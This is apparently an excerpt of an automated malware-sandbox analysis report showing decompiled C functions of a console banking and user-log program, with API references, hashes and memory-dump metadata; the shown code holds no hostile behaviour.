				_push(0xbb);
				printf("%c");
				_t102 = _t101 + 8;
				_v12 = _a8 + 1;
				while(_v12 < _a16) {
					E00231000(_a4, _v12);
					_v8 = _a4;
					while(_v8 < _a12) {
						if(_v8 == _a4 || _v8 == _a12 - 1) {
							E00231000(_v8, _v12);
							_push(0xba);
							printf("%c");
							_t102 = _t102 + 8;
						}
						_v8 = _v8 + 1;
					}
					_v12 = _v12 + 1;
				}
				E00231000(_a4, _v12);
				_push(0xc8);
				printf("%c");
				_t103 = _t102 + 8;
				_v8 = _a4 + 1;
				while(_v8 < _a12 - 1) {
					E00231000(_v8, _v12);
					_push(0xcd);
					printf("%c");
					_t103 = _t103 + 8;
					_v8 = _v8 + 1;
				}
				E00231000(_v8, _v12);
				_push(0xbc);
				return printf("%c");
			}

APIs

Part of subcall function 00231000: GetStdHandle.KERNEL32(000000F5,00000000,?,002310E3,?,?,?,00237B25), ref: 00231021
Part of subcall function 00231000: SetConsoleCursorPosition.KERNEL32(00000000,?,002310E3,?,?,?,00237B25), ref: 00231028

printf.MSVCRT ref: 002310ED
printf.MSVCRT ref: 0023112C
printf.MSVCRT ref: 0023114E
printf.MSVCRT ref: 002311C3
printf.MSVCRT ref: 002311E7
printf.MSVCRT ref: 00231226
printf.MSVCRT ref: 00231248

Memory Dump Source

Source File: 00000001.00000002.285655278.0000000000231000.00000020.00020000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000001.00000002.285626033.0000000000230000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.285695754.0000000000238000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.285710988.0000000000239000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.285718516.000000000023C000.00000002.00020000.sdmp Download File

Similarity

API ID: printf$ConsoleCursorHandlePosition
String ID:
API String ID: 748348440-0
Opcode ID: bd5bd04ae2e657c2a9244c30e9cf2d03efd6d5b734d3c6732ef2167e06e86d95
Instruction ID: df4a9b2b571e2833018d516639db8bc000a0bfb77bf4d0932aee676e92712ef6
Opcode Fuzzy Hash: bd5bd04ae2e657c2a9244c30e9cf2d03efd6d5b734d3c6732ef2167e06e86d95
Instruction Fuzzy Hash: FA418FB5A20208FFCB08DFA8DD85EDE7B71BF44345F208158FA49AB244C671AA70DB55

Uniqueness

Uniqueness Score: -1.00%

Function 00233ADF, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115
stringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00233ADF() {
				struct _IO_FILE* _t233;
				int _t243;
				struct _IO_FILE* _t244;
				void* _t264;
				int _t285;
				void* _t298;
				void* _t302;
				struct _IO_FILE* _t327;
				int _t329;
				int _t334;
				struct _IO_FILE* _t343;
				void* _t359;
				struct _IO_FILE* _t382;
				void* _t399;
				struct _IO_FILE* _t427;
				void* _t474;
				void* _t476;
				void* _t477;
				void* _t478;
				void* _t483;
				void* _t484;
				void* _t487;
				void* _t489;
				void* _t495;
				void* _t496;
				long long _t502;

				L0:
				while(1) {
					L0:
					 *(_t474 - 8) = 1 +  *(_t474 - 8);
					 *(_t474 - 0xc) = 1 +  *(_t474 - 0xc);
					while(1) {
						L69:
						if( *(_t474 - 8) <  *(_t474 - 0x18)) {
						}
						L70:
						E00231000(5,  *(_t474 - 0xc) + 0xa);
						_push(1 +  *(_t474 - 8));
						printf("%d.");
						 *((char*)( *(_t474 - 8) * 0x45 +  *((intOrPtr*)(_t474 - 0x10)) + 0x36)) = 0;
						 *((char*)( *(_t474 - 8) * 0x45 +  *((intOrPtr*)(_t474 - 0x10)) + 0x40)) = 0;
						_t196 = 0x22 +  *(_t474 - 8) * 0x45; // 0x23
						_t285 = strlen( *((intOrPtr*)(_t474 - 0x10)) + _t196);
						_t489 = _t476 + 0xc;
						if(_t285 < 0xa) {
							_t359 =  *(_t474 - 8) * 0x45;
							_t200 = _t359 + 0x22; // 0x23
							E00231410(_t502,  *((intOrPtr*)(_t474 - 0x10)) + _t200);
						}
						L72:
						E00231000(9,  *(_t474 - 0xc) + 0xa);
						_t205 = 0x3b +  *(_t474 - 8) * 0x45; // 0x3c
						_push( *((intOrPtr*)(_t474 - 0x10)) + _t205);
						_t209 = 0x31 +  *(_t474 - 8) * 0x45; // 0x32
						_push( *((intOrPtr*)(_t474 - 0x10)) + _t209);
						_t213 = 0x22 +  *(_t474 - 8) * 0x45; // 0x23
						_push( *((intOrPtr*)(_t474 - 0x10)) + _t213);
						_t217 = 4 +  *(_t474 - 8) * 0x45; // 0x5
						_push( *((intOrPtr*)(_t474 - 0x10)) + _t217);
						printf("%s\t\t%s\t%s\t\t%s");
						_t476 = _t489 + 0x14;
						if( *(_t474 - 8) <  *(_t474 - 0x1c) + 9) {
							L74:
							goto L0;
						} else {
							L73:
							 *(_t474 - 0x1c) =  *(_t474 - 0x1c) + 0xa;
						}
						L75:
						_t345 =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0x53) {
							L77:
							 *(_t474 - 0x34) = 1;
						} else {
							L76:
							if( *((char*)(_t474 - 1)) == 0x73) {
								goto L77;
							}
						}
						L78:
						if( *((char*)(_t474 - 1)) == 0x20) {
							_t345 =  *(_t474 - 8);
							if( *(_t474 - 8) ==  *(_t474 - 0x18)) {
								 *(_t474 - 0x1c) = 0;
							}
						}
						L81:
						if( *((char*)(_t474 - 1)) == 0x53) {
							L50:
							E002323F0(_t345, _t502);
							if( *(_t474 - 0x18) >= 0xc) {
								E00231000(0xf, 0x15);
								printf("Press SPACE BAR to view more data");
								_t487 = _t476 + 4;
							} else {
								E00231000(8, 0x15);
								printf("Press S to toggle Sorting between ascending or descending order.");
								_t487 = _t476 + 4;
							}
							L53:
							E00231000(5, 8);
							printf("SN\t User Name\tDate\t\tStart time\tEnd Time");
							_t476 = _t487 + 4;
							E00231000(4, 9);
							 *(_t474 - 8) = 0;
							while(1) {
								L55:
								if( *(_t474 - 8) >= 0x46) {
									break;
								}
								L56:
								_push(0xc4);
								printf("%c");
								_t476 = _t476 + 8;
								L54:
								_t302 = 1 +  *(_t474 - 8);
								 *(_t474 - 8) = _t302;
							}
							L57:
							if( *(_t474 - 0x34) != 0) {
								L58:
								 *(_t474 - 8) =  *(_t474 - 0x18) - 1;
								while(1) {
									L60:
									if( *(_t474 - 8) < 0) {
										break;
									}
									L61:
									memcpy(( *(_t474 - 0x18) -  *(_t474 - 8) - 1) * 0x45 +  *((intOrPtr*)(_t474 - 0x24)),  *(_t474 - 8) * 0x45 +  *((intOrPtr*)(_t474 - 0x10)), 0x11 << 2);
									_t476 = _t476 + 0xc;
									asm("movsb");
									L59:
									_t399 =  *(_t474 - 8) - 1;
									 *(_t474 - 8) = _t399;
								}
								L62:
								 *(_t474 - 8) = 0;
								while(1) {
									L64:
									if( *(_t474 - 8) >=  *(_t474 - 0x18)) {
										goto L66;
									}
									L65:
									memcpy( *(_t474 - 8) * 0x45 +  *((intOrPtr*)(_t474 - 0x10)),  *(_t474 - 8) * 0x45 +  *((intOrPtr*)(_t474 - 0x24)), 0x11 << 2);
									_t476 = _t476 + 0xc;
									asm("movsb");
									L63:
									_t298 = 1 +  *(_t474 - 8);
									 *(_t474 - 8) = _t298;
								}
							}
							L66:
							if( *(_t474 - 0x1c) >  *(_t474 - 0x18)) {
								 *(_t474 - 0x1c) = 0;
							}
							L68:
							 *(_t474 - 8) =  *(_t474 - 0x1c);
							 *(_t474 - 0xc) = 0;
							L69:
							if( *(_t474 - 8) <  *(_t474 - 0x18)) {
							}
							goto L75;
						}
						L82:
						_t264 =  *((char*)(_t474 - 1));
						if(_t264 == 0x73) {
							goto L50;
						}
						L83:
						_t345 =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0x20) {
							goto L50;
						}
						L84:
						while(1) {
							L86:
							if(1 == 0) {
								break;
							}
							L1:
							 *(_t474 - 8) = 0;
							 *(_t474 - 0x28) = 0;
							 *(_t474 - 0x1c) = 0;
							 *(_t474 - 0x34) = 0;
							_t233 = fopen("LOG.DAT", "r");
							_t477 = _t476 + 8;
							 *0x23b280 = _t233;
							while(1) {
								L2:
								_t12 = 0x3b +  *(_t474 - 8) * 0x45; // 0x89
								_t16 = 0x31 +  *(_t474 - 8) * 0x45; // 0x7f
								_t20 = 0x22 +  *(_t474 - 8) * 0x45; // 0x70
								_t343 =  *0x23b280; // 0x0
								_t243 = fscanf(_t343, "%s %s %s %s\n",  *(_t474 - 8) * 0x45 +  *((intOrPtr*)(_t474 - 0x14)),  *((intOrPtr*)(_t474 - 0x14)) + _t20,  *((intOrPtr*)(_t474 - 0x14)) + _t16,  *((intOrPtr*)(_t474 - 0x14)) + _t12);
								_t478 = _t477 + 0x18;
								if(_t243 == 0xffffffff) {
									break;
								}
								L3:
								_t327 = fopen("USER.DAT", "r");
								_t495 = _t478 + 8;
								 *0x23b288 = _t327;
								while(1) {
									L4:
									_t427 =  *0x23b288; // 0x0
									_t329 = fscanf(_t427, "%s %s %s\n", _t474 - 0x38, _t474 - 0x58, _t474 - 0x78);
									_t496 = _t495 + 0x14;
									if(_t329 == 0xffffffff) {
										break;
									}
									L5:
									_t334 = strcmp( *(_t474 - 8) * 0x45 +  *((intOrPtr*)(_t474 - 0x14)), _t474 - 0x38);
									_t495 = _t496 + 8;
									if(_t334 == 0) {
										_t33 = 4 +  *(_t474 - 8) * 0x45; // 0x52
										strcpy( *((intOrPtr*)(_t474 - 0x14)) + _t33, _t474 - 0x58);
										_t495 = _t495 + 8;
									}
								}
								L8:
								 *(_t474 - 8) = 1 +  *(_t474 - 8);
								_t382 =  *0x23b288; // 0x0
								fclose(_t382);
								_t477 = _t496 + 4;
							}
							L9:
							 *(_t474 - 0x30) =  *(_t474 - 8);
							_t244 =  *0x23b280; // 0x0
							fclose(_t244);
							E002323F0(_t343, _t502);
							E00231000(0x1e, 8);
							printf("1. View by USER NAME");
							E00231000(0x1e, 0xa);
							printf("2. View by DATE");
							E00231000(0x1e, 0xc);
							printf("3. View ALL User history");
							E00231000(0x1e, 0xe);
							printf("4. Return to main menu");
							_t483 = _t478 + 0x14;
							E00231000(1, 0xf);
							 *(_t474 - 8) = 0;
							while(1) {
								L11:
								if( *(_t474 - 8) >= 0x4e) {
									break;
								}
								L12:
								printf("_");
								_t483 = _t483 + 4;
								_t343 = 1 +  *(_t474 - 8);
								 *(_t474 - 8) = _t343;
							}
							L13:
							E00231000(0x17, 0x11);
							printf(" Press a number between the range [1 -4]  ");
							_t484 = _t483 + 4;
							 *(_t474 - 0xc) = 0;
							 *((char*)(_t474 - 2)) =  *(_t474 - 0xc);
							E002323F0(_t343, _t502);
							 *(_t474 - 0x20) =  *((char*)(_t474 - 2));
							_t345 =  *(_t474 - 0x20) - 1;
							 *(_t474 - 0x20) =  *(_t474 - 0x20) - 1;
							if( *(_t474 - 0x20) > 3) {
								L38:
								E002323F0(_t345, _t502);
								E00231000(0xa, 0xa);
								printf("Your input is out of range! Enter a choice between 1 to 4!");
								E00231000(0xf, 0xc);
								_t264 = printf("Press ENTER to return to main menu...");
								_t476 = _t484 + 8;
								 *(_t474 - 0x28) = 1;
								goto L39;
							} else {
								L14:
								switch( *((intOrPtr*)( *(_t474 - 0x20) * 4 +  &M00233C60))) {
									case 0:
										L15:
										E00231000(0x1e, 0xa);
										printf("Enter user name : ");
										_push(_t474 - 0x58);
										scanf(" %s");
										_t314 = _strupr(_t474 - 0x58);
										_t393 = _t474 - 0x58;
										_t264 = strcpy(_t474 - 0x58, _t314);
										_t476 = _t484 + 0x18;
										 *(_t474 - 8) = 0;
										while(1) {
											L17:
											__eflags =  *(_t474 - 8) -  *(_t474 - 0x30);
											if( *(_t474 - 8) >=  *(_t474 - 0x30)) {
												break;
											}
											L18:
											_t64 = 4 +  *(_t474 - 8) * 0x45; // 0x52
											_t316 = _strupr( *((intOrPtr*)(_t474 - 0x14)) + _t64);
											_t68 = 4 +  *(_t474 - 8) * 0x45; // 0x52
											strcpy( *((intOrPtr*)(_t474 - 0x14)) + _t68, _t316);
											_t320 =  *(_t474 - 8) * 0x45;
											_t377 =  *((intOrPtr*)(_t474 - 0x14));
											_t73 = _t320 + 4; // 0x52
											_t393 = _t377 + _t73;
											_t321 = strcmp(_t377 + _t73, _t474 - 0x58);
											_t476 = _t476 + 0x14;
											__eflags = _t321;
											if(_t321 == 0) {
												memcpy( *(_t474 - 0xc) * 0x45 +  *((intOrPtr*)(_t474 - 0x10)),  *(_t474 - 8) * 0x45 +  *((intOrPtr*)(_t474 - 0x14)), 0x11 << 2);
												_t476 = _t476 + 0xc;
												asm("movsb");
												_t325 = 1 +  *(_t474 - 0xc);
												__eflags = _t325;
												 *(_t474 - 0xc) = _t325;
											}
											_t264 = 1 +  *(_t474 - 8);
											__eflags = _t264;
											 *(_t474 - 8) = _t264;
										}
										L21:
										_t345 =  *(_t474 - 0xc);
										 *(_t474 - 0x18) =  *(_t474 - 0xc);
										goto L39;
									case 1:
										do {
											L22:
											E00231000(0x1e, 0xa) = printf("Enter Date (dd/mm/yyyy) : ");
											__edx = __ebp - 0x58;
											_push(__ebp - 0x58);
											scanf(" %s") = __ebp - 0x58;
											__eax = E00232170(__ebp - 0x58);
											__eflags = __eax;
											if(__eax == 0) {
												E00231260(0x1e, 0xa, 0x46, 0xa) = printf(0x239a14);
											}
											__ecx = __ebp - 0x58;
											__eax = E00232170(__ebp - 0x58);
											__eflags = __eax;
										} while (__eax == 0);
										__edx = __ebp - 0x58;
										__eax = E00231330(__ebp - 0x58);
										 *(__ebp - 8) = 0;
										 *(__ebp - 0xc) = 0;
										while(1) {
											L27:
											__ecx =  *(__ebp - 8);
											__eflags =  *(__ebp - 8) -  *((intOrPtr*)(__ebp - 0x30));
											if( *(__ebp - 8) >=  *((intOrPtr*)(__ebp - 0x30))) {
												break;
											}
											L28:
											__edx = __ebp - 0x58;
											__eax =  *(__ebp - 8);
											__eax =  *(__ebp - 8) * 0x45;
											__ecx =  *(__ebp - 0x14);
											_t97 = __eax + 0x22; // 0x70
											__edx = __ecx + _t97;
											__eax = strcmp(__ecx + _t97, __ebp - 0x58);
											__eflags = __eax;
											if(__eax == 0) {
												__ecx = 0x11;
												__eax = memcpy( *(__ebp - 0xc) * 0x45 +  *((intOrPtr*)(__ebp - 0x10)),  *(__ebp - 8) * 0x45 +  *(__ebp - 0x14), 0x11 << 2);
												__ecx = 0;
												asm("movsb");
												__eax =  *(__ebp - 0xc);
												__eax = 1 +  *(__ebp - 0xc);
												__eflags = __eax;
												 *(__ebp - 0xc) = __eax;
											}
											__eax =  *(__ebp - 8);
											__eax = 1 +  *(__ebp - 8);
											__eflags = __eax;
											 *(__ebp - 8) = __eax;
										}
										L31:
										__ecx =  *(__ebp - 0xc);
										 *(__ebp - 0x18) = __ecx;
										goto L39;
									case 2:
										L32:
										 *(__ebp - 8) = 0;
										while(1) {
											L34:
											__eax =  *(__ebp - 8);
											__eflags =  *(__ebp - 8) -  *((intOrPtr*)(__ebp - 0x30));
											if( *(__ebp - 8) >=  *((intOrPtr*)(__ebp - 0x30))) {
												break;
											}
											L35:
											__ecx = 0x11;
											__eax = memcpy( *(__ebp - 0xc) * 0x45 +  *((intOrPtr*)(__ebp - 0x10)),  *(__ebp - 8) * 0x45 +  *(__ebp - 0x14), 0x11 << 2);
											__ecx = 0;
											asm("movsb");
											__ecx =  *(__ebp - 0xc);
											__ecx = 1 +  *(__ebp - 0xc);
											 *(__ebp - 0xc) = __ecx;
											__edx =  *(__ebp - 8);
											__edx = 1 +  *(__ebp - 8);
											__eflags = __edx;
											 *(__ebp - 8) = __edx;
										}
										L36:
										__edx =  *(__ebp - 0xc);
										 *(__ebp - 0x18) =  *(__ebp - 0xc);
										L39:
										__eflags =  *(_t474 - 0x18);
										if( *(_t474 - 0x18) == 0) {
											E002323F0(_t345, _t502);
											E00231000(0x1b, 0xc);
											printf(0x239a7c);
											_t476 = _t476 + 4;
											_t264 = E00233460(_t393, __eflags, _t502);
										}
										__eflags =  *(_t474 - 0x28);
										if( *(_t474 - 0x28) != 0) {
											L85:
											 *(_t474 - 0x28) = 0;
										} else {
											L42:
											 *(_t474 - 8) = 0;
											 *(_t474 - 0xc) =  *(_t474 - 0x18) - 1;
											while(1) {
												L44:
												__eflags =  *(_t474 - 8) -  *(_t474 - 0x18);
												if( *(_t474 - 8) >=  *(_t474 - 0x18)) {
													break;
												}
												L45:
												memcpy( *(_t474 - 8) * 0x45 +  *((intOrPtr*)(_t474 - 0x24)),  *(_t474 - 0xc) * 0x45 +  *((intOrPtr*)(_t474 - 0x10)), 0x11 << 2);
												_t476 = _t476 + 0xc;
												asm("movsb");
												_t345 = 1 +  *(_t474 - 8);
												 *(_t474 - 8) = 1 +  *(_t474 - 8);
												_t419 =  *(_t474 - 0xc) - 1;
												__eflags = _t419;
												 *(_t474 - 0xc) = _t419;
											}
											L46:
											 *(_t474 - 8) = 0;
											while(1) {
												L48:
												__eflags =  *(_t474 - 8) -  *(_t474 - 0x18);
												if( *(_t474 - 8) >=  *(_t474 - 0x18)) {
													goto L50;
												}
												L49:
												memcpy( *(_t474 - 8) * 0x45 +  *((intOrPtr*)(_t474 - 0x10)),  *(_t474 - 8) * 0x45 +  *((intOrPtr*)(_t474 - 0x24)), 0x11 << 2);
												_t476 = _t476 + 0xc;
												asm("movsb");
												L47:
												_t345 = 1 +  *(_t474 - 8);
												__eflags = _t345;
												 *(_t474 - 8) = _t345;
											}
											goto L50;
										}
										goto L86;
									case 3:
										L37:
										goto L87;
								}
							}
							break;
						}
						L87:
						return _t264;
						L88:
					}
				}
			}

APIs

Part of subcall function 00231000: GetStdHandle.KERNEL32(000000F5,00000000,?,002310E3,?,?,?,00237B25), ref: 00231021
Part of subcall function 00231000: SetConsoleCursorPosition.KERNEL32(00000000,?,002310E3,?,?,?,00237B25), ref: 00231028

printf.MSVCRT ref: 00233B17
strlen.MSVCRT ref: 00233B5A
printf.MSVCRT ref: 00233BC5

Strings

%s%s%s%s, xrefs: 00233BC0
%d., xrefs: 00233B12

Memory Dump Source

Source File: 00000001.00000002.285655278.0000000000231000.00000020.00020000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000001.00000002.285626033.0000000000230000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.285695754.0000000000238000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.285710988.0000000000239000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.285718516.000000000023C000.00000002.00020000.sdmp Download File

Similarity

API ID: printf$ConsoleCursorHandlePositionstrlen
String ID: %d.$%s%s%s%s
API String ID: 3542503040-4028964860
Opcode ID: 6b7080ef7773ad342dc6b0a65598082639e0e7461ae16222946e0e5f93a78ab7
Instruction ID: e4384a2c14e747c852d370005a9aeef8b85390d300e2e5b284ce11f74cb55594
Opcode Fuzzy Hash: 6b7080ef7773ad342dc6b0a65598082639e0e7461ae16222946e0e5f93a78ab7
Instruction Fuzzy Hash: C94171B1E1404AAFCB1CCF84D5E1ABEFB76EF91308F14809AD001AB245D7319B96CB40

Uniqueness

Uniqueness Score: -1.00%

Function 002373AA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43
stringCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E002373AA() {
				int _t167;
				int _t174;
				int _t193;
				void* _t346;
				void* _t348;
				void* _t354;
				void* _t355;
				void* _t365;
				void* _t366;
				void* _t368;
				long long _t375;

				L0:
				while(1) {
					L0:
					 *(_t346 - 0x10) =  *(_t346 - 0x10) + 1;
					L16:
					while(1) {
						L16:
						if( *(_t346 - 0x10) < 0xa) {
							L17:
							E00231000(2,  *(_t346 - 0x10) + 8);
							_push( *(_t346 - 4) + 1);
							printf("%d.");
							_t365 = _t348 + 8;
							 *(_t346 - 0x14) = 0;
							while(1) {
								L19:
								_t48 = 8 +  *(_t346 - 4) * 0x5c; // 0x8
								_t193 = strlen( *((intOrPtr*)(_t346 - 8)) + _t48);
								_t365 = _t365 + 4;
								if( *(_t346 - 0x14) >= _t193) {
									break;
								}
								L20:
								if( *((char*)( *(_t346 - 4) * 0x5c +  *((intOrPtr*)(_t346 - 8)) +  *(_t346 - 0x14) + 8)) == 0x2b) {
									 *((char*)( *(_t346 - 4) * 0x5c +  *((intOrPtr*)(_t346 - 8)) +  *(_t346 - 0x14) + 8)) = 0x20;
								}
								 *(_t346 - 0x14) =  *(_t346 - 0x14) + 1;
							}
							L23:
							E00231000(6,  *(_t346 - 0x10) + 8);
							_t64 = 8 +  *(_t346 - 4) * 0x5c; // 0x8
							puts( *((intOrPtr*)(_t346 - 8)) + _t64);
							_t366 = _t365 + 4;
							if( *((intOrPtr*)(_t346 - 0x20)) == 0) {
								_t69 = 0x21 +  *(_t346 - 4) * 0x5c; // 0x21
								E00231410(_t375,  *((intOrPtr*)(_t346 - 8)) + _t69);
							}
							E00231000(0x1c,  *(_t346 - 0x10) + 8);
							_t74 = 0x21 +  *(_t346 - 4) * 0x5c; // 0x21
							puts( *((intOrPtr*)(_t346 - 8)) + _t74);
							 *((char*)( *(_t346 - 4) * 0x5c +  *((intOrPtr*)(_t346 - 8)) + 0x35)) = 0;
							E00231000(0x2c,  *(_t346 - 0x10) + 8);
							_t83 = 0x30 +  *(_t346 - 4) * 0x5c; // 0x30
							_push( *((intOrPtr*)(_t346 - 8)) + _t83);
							printf("%s");
							_t368 = _t366 + 0xc;
							if( *((char*)( *(_t346 - 4) * 0x5c +  *((intOrPtr*)(_t346 - 8)) + 8)) != 0x54) {
								if( *((char*)( *(_t346 - 4) * 0x5c +  *((intOrPtr*)(_t346 - 8)) + 8)) != 0x43 ||  *((char*)( *(_t346 - 4) * 0x5c +  *((intOrPtr*)(_t346 - 8)) + 0xd)) != 0x57 &&  *((char*)( *(_t346 - 4) * 0x5c +  *((intOrPtr*)(_t346 - 8)) + 0xbadbb5)) != 0x6c) {
									E00231000(0x32,  *(_t346 - 0x10) + 8);
									asm("cvtss2sd xmm0, [edx+ecx+0x58]");
									asm("movsd [esp], xmm0");
									printf("%13.2f");
									_t348 = _t368 - 8 + 0xc;
									asm("movss xmm0, [ebp-0x2c]");
									asm("addss xmm0, [ecx+eax+0x58]");
									asm("movss [ebp-0x2c], xmm0");
								} else {
									E00231000(0x41,  *(_t346 - 0x10) + 8);
									asm("cvtss2sd xmm0, [eax+edx+0x58]");
									asm("movsd [esp], xmm0");
									printf("%13.2f");
									_t348 = _t368 - 8 + 0xc;
									asm("movss xmm0, [ebp-0x18]");
									asm("addss xmm0, [edx+ecx+0x58]");
									asm("movss [ebp-0x18], xmm0");
								}
							} else {
								E00231000(0x41,  *(_t346 - 0x10) + 8);
								asm("cvtss2sd xmm0, [ecx+eax+0x58]");
								asm("movsd [esp], xmm0");
								printf("%13.2f");
								_t348 = _t368 - 8 + 0xc;
								asm("movss xmm0, [ebp-0x18]");
								asm("addss xmm0, [eax+edx+0x58]");
								asm("movss [ebp-0x18], xmm0");
							}
							 *(_t346 - 4) =  *(_t346 - 4) + 1;
							_t174 =  *(_t346 - 4);
							if(_t174 <  *(_t346 - 0xc)) {
								L34:
								goto L0;
							}
						}
						L35:
						 *(_t346 - 0x24) =  *(_t346 - 0x24) + 0xa;
						if( *(_t346 - 4) >=  *(_t346 - 0xc)) {
							L36:
							E00231000(1,  *(_t346 - 0x10) + 9);
							 *(_t346 - 0x14) = 1;
							L38:
							while( *(_t346 - 0x14) < 0x4f) {
								_push(0xc4);
								printf("%c");
								_t348 = _t348 + 8;
								L37:
								 *(_t346 - 0x14) =  *(_t346 - 0x14) + 1;
							}
							E00231000(0x28,  *(_t346 - 0x10) + 0xa);
							printf("TOTAL");
							E00231000(0x32,  *(_t346 - 0x10) + 0xa);
							asm("cvtss2sd xmm0, [ebp-0x2c]");
							asm("movsd [esp], xmm0");
							printf("%13.2f");
							E00231000(0x41,  *(_t346 - 0x10) + 0xa);
							asm("cvtss2sd xmm0, [ebp-0x18]");
							asm("movsd [esp], xmm0");
							printf("%13.2f");
							_t348 = _t348 + 4 - 8 + 0xc - 8 + 0xc;
							asm("movss xmm0, [0x238110]");
							asm("movss [ebp-0x18], xmm0");
							asm("movss xmm0, [ebp-0x18]");
							asm("movss [ebp-0x2c], xmm0");
							_t174 = E00231000(1,  *(_t346 - 0x10) + 0xb);
							 *(_t346 - 0x14) = 1;
							L42:
							while( *(_t346 - 0x14) < 0x4f) {
								_push(0xc4);
								printf("%c");
								_t348 = _t348 + 8;
								L41:
								_t174 =  *(_t346 - 0x14) + 1;
								 *(_t346 - 0x14) = _t174;
							}
							 *((intOrPtr*)(_t346 - 0x20)) =  *((intOrPtr*)(_t346 - 0x20)) + 1;
						}
						L45:
						if( *((char*)(_t346 - 0x19)) == 0x20) {
							_t174 =  *(_t346 - 0x28) + 1;
							 *(_t346 - 0x28) = _t174;
						}
						L47:
						_t240 =  *((char*)(_t346 - 0x19));
						if( *((char*)(_t346 - 0x19)) == 0x20) {
							L1:
							E002323F0(_t240, _t375);
							E00231000(2, 6);
							puts("SN");
							E00231000(6, 6);
							puts("     Details");
							E00231000(0x1c, 6);
							puts("Date");
							E00231000(0x2c, 6);
							puts("Time");
							E00231000(0x32, 6);
							puts("   Dr. (NRs.)");
							E00231000(0x41, 6);
							puts("   Cr. (NRs.)");
							_t354 = _t348 + 0x18;
							E00231000(1, 7);
							 *(_t346 - 4) = 1;
							L3:
							while( *(_t346 - 4) < 0x4f) {
								_push(0xc4);
								printf("%c");
								_t354 = _t354 + 8;
								 *(_t346 - 4) =  *(_t346 - 4) + 1;
							}
							E00231000(1, 0x15);
							 *(_t346 - 4) = 1;
							L7:
							while( *(_t346 - 4) < 0x4f) {
								_push(0xc4);
								printf("%c");
								_t354 = _t354 + 8;
								 *(_t346 - 4) =  *(_t346 - 4) + 1;
							}
							if( *(_t346 - 0x24) >  *(_t346 - 0xc)) {
								 *(_t346 - 0x24) = 0;
								 *(_t346 - 0x28) = 1;
							}
							 *(_t346 - 4) =  *(_t346 - 0x24);
							E00231000(2, 0x16);
							asm("cdq");
							_push( *(_t346 - 0xc) / 0xa + 1);
							_push( *(_t346 - 0x28));
							printf("Page : %d out of %d");
							_t355 = _t354 + 0xc;
							if( *(_t346 - 0xc) > 9) {
								asm("cdq");
								if( *(_t346 - 0x28) ==  *(_t346 - 0xc) / 0xa + 1) {
									E00231000(0x19, 0x16);
									printf("Press SPACE BAR to view first page");
									_t355 = _t355 + 4;
								} else {
									E00231000(0x19, 0x16);
									printf("Press SPACE BAR to view next page");
									_t355 = _t355 + 4;
								}
							}
							E00231000(2, 0x14);
							_push(_t346 - 0x21a);
							_t167 = printf("A/C holder : %s %s");
							asm("movss xmm0, [ebp-0x190]");
							asm("movss [esp], xmm0");
							E00231730(_t167, _t346 - 0xd8, _t346 - 0x238);
							strcpy(_t346 - 0xbc, "Bank Balance : ");
							strcat(_t346 - 0xbc, _t346 - 0xd8);
							E00231000(0x4e - strlen(_t346 - 0xbc), 0x14);
							_push(_t346 - 0xbc);
							_t174 = printf("%s");
							_t348 = _t355 + 0x24;
							 *(_t346 - 0x10) = 0;
							continue;
						}
						L48:
						return _t174;
						L49:
					}
				}
			}

APIs

printf.MSVCRT ref: 002373D7
strlen.MSVCRT ref: 00237400
puts.MSVCRT ref: 00237452
puts.MSVCRT ref: 00237490
printf.MSVCRT ref: 002374D0
printf.MSVCRT ref: 0023751E
printf.MSVCRT ref: 002375C4
printf.MSVCRT ref: 00237691
printf.MSVCRT ref: 002376AF
printf.MSVCRT ref: 002376D8
printf.MSVCRT ref: 00237701
printf.MSVCRT ref: 00237751

Part of subcall function 00231000: GetStdHandle.KERNEL32(000000F5,00000000,?,002310E3,?,?,?,00237B25), ref: 00231021
Part of subcall function 00231000: SetConsoleCursorPosition.KERNEL32(00000000,?,002310E3,?,?,?,00237B25), ref: 00231028

Strings

%d., xrefs: 002373D2

Memory Dump Source

Source File: 00000001.00000002.285655278.0000000000231000.00000020.00020000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000001.00000002.285626033.0000000000230000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.285695754.0000000000238000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.285710988.0000000000239000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.285718516.000000000023C000.00000002.00020000.sdmp Download File

Similarity

API ID: printf$puts$ConsoleCursorHandlePositionstrlen
String ID: %d.
API String ID: 1151322801-478215797
Opcode ID: 105375e62632a9ebfc357a76d027eacc10111541c1c9137cd87dac3c34107abc
Instruction ID: 12fe6655390d73de0688a36e6c15c166e2760ba79c6df8946f37a36045adbb72
Opcode Fuzzy Hash: 105375e62632a9ebfc357a76d027eacc10111541c1c9137cd87dac3c34107abc
Instruction Fuzzy Hash: E71179F091410ADFCF18DB84CA95ABEBBB5FF50308F240069D406BA242D231AE65CB92

Uniqueness

Uniqueness Score: -1.00%

Function 014AFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E014AFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0145CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E014A5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
